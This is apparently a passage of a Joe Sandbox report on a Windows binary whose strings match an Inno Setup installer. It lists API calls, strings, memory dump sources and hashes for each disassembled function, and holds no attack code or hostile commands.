                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Color$StretchText
                                                                          • String ID:
                                                                          • API String ID: 2984075790-0
                                                                          • Opcode ID: 96642afef6407557abda8c1cb6f38d9a010b32914ce32b6cc36c1a5a9073b633
                                                                          • Instruction ID: 5791d4d8e51028595b948ed591e6ff6c43c29dc3dd821c9bc5bae20fa008be23
                                                                          • Opcode Fuzzy Hash: 96642afef6407557abda8c1cb6f38d9a010b32914ce32b6cc36c1a5a9073b633
                                                                          • Instruction Fuzzy Hash: F661E5B5A00104EFCB40EFA9D985E9AB7F8AF0D314B10816AF518DB252C734ED41CF58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00456130,?, /s ",?,regsvr32.exe",?,00456130), ref: 004560A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDirectoryHandleSystem
                                                                          • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                          • API String ID: 2051275411-1862435767
                                                                          • Opcode ID: 1ae4d1559c225658233d195df01a5ac76f1bcba5e74ca4c9dacf9a152af87d32
                                                                          • Instruction ID: 1b1342de70b8511bd96e109cd760b193c6bc6e2768a22c9f7c7172ce61990ba6
                                                                          • Opcode Fuzzy Hash: 1ae4d1559c225658233d195df01a5ac76f1bcba5e74ca4c9dacf9a152af87d32
                                                                          • Instruction Fuzzy Hash: 95411970E007085BDB10EFE5C842B9DB7F9AF44305F91407BA904BB297D7789A098B59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044CA3D
                                                                          • GetSysColor.USER32(00000014), ref: 0044CA44
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044CA5C
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA85
                                                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA8F
                                                                          • GetSysColor.USER32(00000010), ref: 0044CA96
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044CAAE
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAD7
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CB02
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Text$Color$Draw$OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 1005981011-0
                                                                          • Opcode ID: 9e5c892965933efe92cb1196a4cf079dced8b69e9bfa1b103b040bba4ee2a0e0
                                                                          • Instruction ID: 79e5725ec2e75caab84353522faa1c644d19f3f9c4a46f72b84b259f8bdbd55b
                                                                          • Opcode Fuzzy Hash: 9e5c892965933efe92cb1196a4cf079dced8b69e9bfa1b103b040bba4ee2a0e0
                                                                          • Instruction Fuzzy Hash: 3921EFB42015047FC710FB2ACC8AE8BBBECDF19319B01457A7918EB393C678DD408669
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00472DB0: GetWindowThreadProcessId.USER32(00000000), ref: 00472DB8
                                                                            • Part of subcall function 00472DB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00472EAF,00494F8C,00000000), ref: 00472DCB
                                                                            • Part of subcall function 00472DB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00472DD1
                                                                          • SendMessageA.USER32(00000000,0000004A,00000000,B2G), ref: 00472EBD
                                                                          • GetTickCount.KERNEL32 ref: 00472F02
                                                                          • GetTickCount.KERNEL32 ref: 00472F0C
                                                                          • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00472F61
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                          • String ID: B2G$CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                          • API String ID: 613034392-3430418260
                                                                          • Opcode ID: 83606b9c116b6885daef421b7b8e00522d494f7ddc4e48254dfbdcdd32f55c78
                                                                          • Instruction ID: 8c95786dad12656d13a73ee76c7a4d3a126e112e6abc10061d0091179ba2d091
                                                                          • Opcode Fuzzy Hash: 83606b9c116b6885daef421b7b8e00522d494f7ddc4e48254dfbdcdd32f55c78
                                                                          • Instruction Fuzzy Hash: 00319174E002159ADB10EBB9C9867EEB6F09F44304F60843AF548EB392D7BC8E41879D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0044FE04: SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                            • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 004904A5
                                                                          • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004904B9
                                                                          • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004904D3
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904DF
                                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904E5
                                                                          • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904F8
                                                                          Strings
                                                                          • Deleting Uninstall data files., xrefs: 0049041B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                          • String ID: Deleting Uninstall data files.
                                                                          • API String ID: 1570157960-2568741658
                                                                          • Opcode ID: 3a7a3c4f988273c5faf0984e358184faf661e247c75e3eb8a852b62590ab03d6
                                                                          • Instruction ID: c015f2c418b27fe41d2ce248e3be245557a268e7959eb0275d209c4c83f57638
                                                                          • Opcode Fuzzy Hash: 3a7a3c4f988273c5faf0984e358184faf661e247c75e3eb8a852b62590ab03d6
                                                                          • Instruction Fuzzy Hash: DB21BB70344700AEEB21EB76EC55F2B77A8EB55744F60453BBA04DA6D2D6BC9C008B1C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046BD21,?,?,?,?,00000000), ref: 0046BC8B
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046BD21), ref: 0046BCA2
                                                                          • AddFontResourceA.GDI32(00000000), ref: 0046BCBF
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046BCD3
                                                                          Strings
                                                                          • Failed to set value in Fonts registry key., xrefs: 0046BC94
                                                                          • Failed to open Fonts registry key., xrefs: 0046BCA9
                                                                          • AddFontResource, xrefs: 0046BCDD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                          • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                          • API String ID: 955540645-649663873
                                                                          • Opcode ID: 7a6271196282a98db9218d46e73dadc0b019169c58c33c438b6e42a7b698be6e
                                                                          • Instruction ID: 8028dfed4777ef4cba2b708c37a4b099d1cdf5d3aae4b1ac28208e9a303e9908
                                                                          • Opcode Fuzzy Hash: 7a6271196282a98db9218d46e73dadc0b019169c58c33c438b6e42a7b698be6e
                                                                          • Instruction Fuzzy Hash: E121B2707402047BE710EBA69C42F6E67ACDB55704F60443BB900EB2C2EB7D9E4596AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00416380: GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
                                                                            • Part of subcall function 00416380: UnregisterClassA.USER32(?,00400000), ref: 0041641B
                                                                            • Part of subcall function 00416380: RegisterClassA.USER32(?), ref: 0041643E
                                                                          • GetVersion.KERNEL32 ref: 0045F360
                                                                          • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0045F39E
                                                                          • SHGetFileInfo.SHELL32(0045F43C,00000000,?,00000160,00004011), ref: 0045F3BB
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0045F3D9
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,0045F43C,00000000,?,00000160,00004011), ref: 0045F3DF
                                                                          • SetCursor.USER32(?,0045F41F,00007F02,0045F43C,00000000,?,00000160,00004011), ref: 0045F412
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                          • String ID: Explorer
                                                                          • API String ID: 2594429197-512347832
                                                                          • Opcode ID: 5c897608954e0c34f46d57c9c9468377b08e724fc1c9a15d7250c0687c3dca48
                                                                          • Instruction ID: 84e95c20810325967785af02823865f4c58c42daffe30e25327ba0847e04abb2
                                                                          • Opcode Fuzzy Hash: 5c897608954e0c34f46d57c9c9468377b08e724fc1c9a15d7250c0687c3dca48
                                                                          • Instruction Fuzzy Hash: 01213A707803046AE710BB769C47F9B36889B0A709F4144BFBF05EA2C3CA7D8C09866D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(00494420,00000000,00401B68), ref: 00401ABD
                                                                          • LocalFree.KERNEL32(00653390,00000000,00401B68), ref: 00401ACF
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00653390,00000000,00401B68), ref: 00401AEE
                                                                          • LocalFree.KERNEL32(00654390,?,00000000,00008000,00653390,00000000,00401B68), ref: 00401B2D
                                                                          • RtlLeaveCriticalSection.KERNEL32(00494420,00401B6F), ref: 00401B58
                                                                          • RtlDeleteCriticalSection.KERNEL32(00494420,00401B6F), ref: 00401B62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID: dIe
                                                                          • API String ID: 3782394904-2902252405
                                                                          • Opcode ID: ca3664eef181b3c450eb25f8da65eda267e6af06c45086156d65a8afb80b51bf
                                                                          • Instruction ID: e723898d31bd980d44dc420abd38e4993862ec3455be7bfe2ac2130caf5f6e99
                                                                          • Opcode Fuzzy Hash: ca3664eef181b3c450eb25f8da65eda267e6af06c45086156d65a8afb80b51bf
                                                                          • Instruction Fuzzy Hash: 9D11BF30A003405AEB15AB65EC82F263BE497E570CF44007BF50067AF1D77C9842C76E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,004582E2,?,00000000,00000000,00000000,?,00000006,?,00000000,00491717,?,00000000,004917BA), ref: 00458226
                                                                            • Part of subcall function 00452C34: FindClose.KERNEL32(000000FF,00452D2A), ref: 00452D19
                                                                          Strings
                                                                          • Failed to delete directory (%d). Will retry later., xrefs: 0045823F
                                                                          • Failed to strip read-only attribute., xrefs: 004581F4
                                                                          • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00458200
                                                                          • Deleting directory: %s, xrefs: 004581AF
                                                                          • Failed to delete directory (%d)., xrefs: 004582BC
                                                                          • Stripped read-only attribute., xrefs: 004581E8
                                                                          • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045829B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorFindLast
                                                                          • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                          • API String ID: 754982922-1448842058
                                                                          • Opcode ID: 86182c70a77fd2d711cf7b3f935fad52ad940f5dc0f2bb935dd50f6a8db30579
                                                                          • Instruction ID: a7040656d29ea07138429a65227d1fe8661808dade238f8de5d3983c6959866f
                                                                          • Opcode Fuzzy Hash: 86182c70a77fd2d711cf7b3f935fad52ad940f5dc0f2bb935dd50f6a8db30579
                                                                          • Instruction Fuzzy Hash: DE41A630A046499ACB00DBA984453BF7AA59B49306F5085BFBC11FB393CF7C890D875E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCapture.USER32 ref: 00422E14
                                                                          • GetCapture.USER32 ref: 00422E23
                                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422E29
                                                                          • ReleaseCapture.USER32 ref: 00422E2E
                                                                          • GetActiveWindow.USER32 ref: 00422E3D
                                                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422EBC
                                                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422F20
                                                                          • GetActiveWindow.USER32 ref: 00422F2F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                          • String ID:
                                                                          • API String ID: 862346643-0
                                                                          • Opcode ID: 712e39948fd123bd0944784c1e4209bda02e8cd1285bd6ba2bce8578b7203805
                                                                          • Instruction ID: 6da1d0135b9d11ce9028ca126f5481e792b9d420ac57a31bdf33f6cc8c40a84a
                                                                          • Opcode Fuzzy Hash: 712e39948fd123bd0944784c1e4209bda02e8cd1285bd6ba2bce8578b7203805
                                                                          • Instruction Fuzzy Hash: 83414370B00254AFDB10EBA9DA46B9D77F1EF45304F5540BAF404AB3A2D7B89E41DB18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • 73A1A570.USER32(00000000), ref: 004293FA
                                                                          • GetTextMetricsA.GDI32(00000000), ref: 00429403
                                                                            • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00429412
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 0042941F
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00429426
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0042942E
                                                                          • GetSystemMetrics.USER32(00000006), ref: 00429453
                                                                          • GetSystemMetrics.USER32(00000006), ref: 0042946D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                          • String ID:
                                                                          • API String ID: 361401722-0
                                                                          • Opcode ID: b2aa10e7b7089fe9610b7b0ad8d25b91e96a29c2a8d1cae1ffdab2385f8086cd
                                                                          • Instruction ID: 2396e8ac942ab906a208d8077257e147ebb5126c2b98df3f18c4b625c9a01c14
                                                                          • Opcode Fuzzy Hash: b2aa10e7b7089fe9610b7b0ad8d25b91e96a29c2a8d1cae1ffdab2385f8086cd
                                                                          • Instruction Fuzzy Hash: 3D0104917087103BF710B2B69CC2F6B6188DB9435DF44013FFA469A3D3D56C8C45866A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,00418FC9,0049295D), ref: 0041DD97
                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,?,00418FC9,0049295D), ref: 0041DDA1
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00418FC9,0049295D), ref: 0041DDAE
                                                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DDBD
                                                                          • GetStockObject.GDI32(00000007), ref: 0041DDCB
                                                                          • GetStockObject.GDI32(00000005), ref: 0041DDD7
                                                                          • GetStockObject.GDI32(0000000D), ref: 0041DDE3
                                                                          • LoadIconA.USER32(00000000,00007F00), ref: 0041DDF4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectStock$A24620A480A570IconLoad
                                                                          • String ID:
                                                                          • API String ID: 3573811560-0
                                                                          • Opcode ID: a00a97ecbf7073f89d6e04e837562f06262f280598315b13768e927efd87297b
                                                                          • Instruction ID: 26d2215c38f7902349b80dbd4a09bdf013e3c627cae683e10812a8645452cf50
                                                                          • Opcode Fuzzy Hash: a00a97ecbf7073f89d6e04e837562f06262f280598315b13768e927efd87297b
                                                                          • Instruction Fuzzy Hash: 381160B06403415AE700BF659892FA63790DBA5709F00813FF208AF2D2CB7E0C058B5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0045F844
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,0045F8D9), ref: 0045F84A
                                                                          • SetCursor.USER32(?,0045F8C1,00007F02,00000000,0045F8D9), ref: 0045F8B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load
                                                                          • String ID: $ $Internal error: Item already expanding
                                                                          • API String ID: 1675784387-1948079669
                                                                          • Opcode ID: 374c6eee6dd7c05d3ed29aecb3c07f8607bfbe119cdd536ef1ba66e3ece505ba
                                                                          • Instruction ID: bc19f93f64f4cfd3b6c64fbb5e4444054adc2e78d3f14390eea5280ae24d604a
                                                                          • Opcode Fuzzy Hash: 374c6eee6dd7c05d3ed29aecb3c07f8607bfbe119cdd536ef1ba66e3ece505ba
                                                                          • Instruction Fuzzy Hash: BAB16B34A006449FDB10DF69C585B9ABBF5AF04305F2484BAEC499B793C778AD4CCB1A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00452677
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                          • API String ID: 390214022-3304407042
                                                                          • Opcode ID: 17577b0f8582e5cf7f857e8520d0c40de0327dd1c60d8c6587b1496694d50cfd
                                                                          • Instruction ID: abf6614f95991f047cbf872b8675d76fa93f36fd66684b0017750e1831af6413
                                                                          • Opcode Fuzzy Hash: 17577b0f8582e5cf7f857e8520d0c40de0327dd1c60d8c6587b1496694d50cfd
                                                                          • Instruction Fuzzy Hash: DB910174A002099BDF01EFA5D942BDEB7B5AF49305F50816BE800B7396D7B85E09CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • 756FE550.OLE32(00493A3C,00000000,00000001,00493774,?,00000000,00454BEE), ref: 00454A34
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • 756FE550.OLE32(00493764,00000000,00000001,00493774,?,00000000,00454BEE), ref: 00454A58
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00454BB3
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: E550String$AllocByteCharFreeMultiWide
                                                                          • String ID: CoCreateInstance$IPersistFile::Save$IShellLink::QueryInterface
                                                                          • API String ID: 2757340368-615220198
                                                                          • Opcode ID: 10b61ca11c913b85dd018bfca0bd87c493ce64892769d21c1277a1ff95bb23bd
                                                                          • Instruction ID: e28da0ffaceb01cee804717922773e9a91ffd05ea7c596c2a735a488419d39cb
                                                                          • Opcode Fuzzy Hash: 10b61ca11c913b85dd018bfca0bd87c493ce64892769d21c1277a1ff95bb23bd
                                                                          • Instruction Fuzzy Hash: 14513371A40105AFDB40DFA9C885F9E7BF8EF4970AF014066B904EB252DB78ED48CB19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004088D0,?,?,?,?,00000000,00000000,00000000,?,004098D7,00000000,004098EA), ref: 004086A2
                                                                            • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                            • Part of subcall function 0040851C: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040871E,?,?,?,00000000,004088D0), ref: 0040852F
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: 9362ec8491f342d5e9289923679bf7722b3cc2aaffa74b6a8b68c84bdd1720ec
                                                                          • Instruction ID: bc7079e0a6f451a0b148bd409c2e0f1595c2818476049878c3843938bdef3741
                                                                          • Opcode Fuzzy Hash: 9362ec8491f342d5e9289923679bf7722b3cc2aaffa74b6a8b68c84bdd1720ec
                                                                          • Instruction Fuzzy Hash: EB514B34B002486BDB00FAA6C941B9F77A9DB94308F50D47FA141BB3C6CA3DCA06971D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetVersion.KERNEL32(00000000,00411869), ref: 004116FC
                                                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 004117BA
                                                                            • Part of subcall function 00411A1C: CreatePopupMenu.USER32 ref: 00411A36
                                                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00411846
                                                                            • Part of subcall function 00411A1C: CreateMenu.USER32 ref: 00411A40
                                                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 0041182D
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                          • String ID: ,$?
                                                                          • API String ID: 2359071979-2308483597
                                                                          • Opcode ID: a4330348a8b5add72bb88b34234a092f9c4bcb0268f2a71967034c917c80e18f
                                                                          • Instruction ID: 4e4ae47f8a98248c410fe7f22b452c6d5eef6af5e50a3601a7d5a52227d6b5a7
